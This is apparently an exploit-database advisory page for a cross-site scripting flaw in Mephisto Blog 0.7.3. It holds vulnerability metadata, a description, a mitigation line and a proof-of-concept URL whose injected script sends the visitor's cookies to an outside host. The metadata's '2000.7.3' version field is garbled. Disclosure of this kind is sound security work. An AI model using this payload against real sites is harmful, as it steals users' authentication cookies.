header-logo
Suggest Exploit
vendor:
Mephisto Blog
by:
Unknown
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Mephisto Blog
Affected Version From: 2000.7.3
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:mephistoblog:mephisto_blog:0.7.3
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Cross-Site Scripting Vulnerability in Mephisto Blog

Mephisto Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input sanitization and validation techniques in the application's code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23141/info

Mephisto Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Mephisto Blog version 0.7.3 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/search?q="/><script>window.location="http://www.example2.com/script.php?data="+document.cookie</script>